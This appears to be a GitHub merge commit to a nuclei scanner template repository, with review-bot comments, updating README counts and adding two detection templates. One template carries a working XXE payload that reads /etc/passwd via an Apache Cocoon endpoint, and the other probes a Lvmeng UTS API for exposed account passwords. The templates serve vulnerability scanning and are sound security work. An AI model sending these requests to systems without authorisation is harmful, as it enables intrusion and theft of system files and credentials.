Merge pull request #10 from projectdiscovery/master

updation
patch-1
Dhiyaneshwaran 2021-02-13 23:51:07 +05:30 committed by GitHub
commit a52551fffe
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 72 additions and 4 deletions

@ -28,11 +28,11 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts |
| --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 176 | default-logins | 8 |
| cves | 177 | default-logins | 8 |
| dns | 6 | exposed-panels | 74 |
| exposed-tokens | 9 | exposures | 44 |
| exposed-tokens | 9 | exposures | 45 |
| fuzzing | 4 | helpers | 2 |
| miscellaneous | 12 | misconfiguration | 40 |
| miscellaneous | 12 | misconfiguration | 43 |
| takeovers | 1 | technologies | 45 |
| vulnerabilities | 81 | workflows | 18 |
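Review bot: The count changes in this table (cves 176 to 177, exposures 44 to 45, misconfiguration 40 to 43) add up to five new templates, which matches the 529 to 534 file total further down, but the commit changes 3 files and adds only two templates, CVE-2020-11991 and lvmeng-uts-disclosure. Confirm that the three new misconfiguration templates listed in the tree already exist on the branch; otherwise regenerate the README from the directory so the counts and the tree cannot drift from the files actually present.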
@ -160,6 +160,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2020-1147.yaml
│   │   ├── CVE-2020-11710.yaml
│   │   ├── CVE-2020-11738.yaml
│   │   ├── CVE-2020-11991.yaml
│   │   ├── CVE-2020-12116.yaml
│   │   ├── CVE-2020-12720.yaml
│   │   ├── CVE-2020-13167.yaml
@ -367,6 +368,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── gmail-api-client-secrets.yaml
│   │   ├── htpasswd-detection.yaml
│   │   ├── laravel-env.yaml
│   │   ├── lvmeng-uts-disclosure.yaml
│   │   ├── magento-config.yaml
│   │   ├── opcache-status-exposure.yaml
│   │   ├── owncloud-config.yaml
@ -437,12 +439,14 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── exposed-service-now.yaml
│   ├── front-page-misconfig.yaml
│   ├── hadoop-unauth.yaml
│   ├── jboss-status.yaml
│   ├── jkstatus-manager.yaml
│   ├── jupyter-ipython-unauth.yaml
│   ├── kubernetes-pods.yaml
│   ├── larvel-debug.yaml
│   ├── linkerd-ssrf-detect.yaml
│   ├── manage-engine-ad-search.yaml
│   ├── mikrotik-graph.yaml
│   ├── misconfigured-docker.yaml
│   ├── nginx-status.yaml
│   ├── php-errors.yaml
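Review bot: `larvel-debug.yaml` in this listing looks like a misspelling of "laravel" (compare `laravel-env.yaml` in the exposures listing above). Because the tree mirrors file names, the fix is to rename the template file and regenerate the README rather than edit this line by hand.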
@ -464,6 +468,7 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── tomcat-scripts.yaml
│   ├── unauthenticated-airflow.yaml
│   ├── unauthenticated-nacos-access.yaml
│   ├── unauthenticated-prtg.yaml
│   ├── wamp-xdebug-detect.yaml
│   └── zenphoto-installation-sensitive-info.yaml
├── takeovers
@ -632,7 +637,7 @@ An overview of the nuclei template directory including number of templates assoc
</details>
**56 directories, 529 files**.
**56 directories, 534 files**.
📖 Documentation
-----

@ -0,0 +1,32 @@
id: CVE-2020-11991
info:
name: Apache Cocoon 2.1.12 XML Injection
author: pikpikcu
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11991
requests:
- method: POST
path:
- "{{BaseURL}}/v2/api/product/manger/getInfo"
headers:
Content-type: "text/xml"
body: |
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&ent;</lastName>
</userInfo>
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
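Review bot: In `body`, the first line `<!--?xml version="1.0" ?-->` is an XML comment rather than an XML declaration, which looks like an artifact of copying from rendered HTML; restore it as `<?xml version="1.0"?>` or drop the line so the request body is what the author intended. The regex matcher has no `part:` set, unlike the matchers in the lvmeng template in this commit; adding `part: body` makes it explicit where `root:[x*]:0:0` is expected. The name says "XML Injection" while the body declares an external entity, so a one-line `description:` in `info` would help whoever triages a hit.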

@ -0,0 +1,31 @@
id: lvmeng-uts-disclosure
info:
name: Lvmeng UTS Disclosure
author: pikpikcu
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/webapi/v1/system/accountmanage/account"
headers:
Content-Type: application/json
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
condition: and
part: header
- type: word
words:
- "password"
- "nsfocus_uts"
- "MANAGER_IP"
condition: and
part: body
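Review bot: The `info` block sets `severity: high` but has no `reference:` or `description:`, unlike the CVE-2020-11991 template in this same commit, so a reader cannot check what is disclosed or why it rates high; add a reference to the advisory or write-up this was built from. In the header matcher, `condition: and` on a single-word list is redundant, and the `Content-Type: application/json` request header on a GET with no body can likely be dropped.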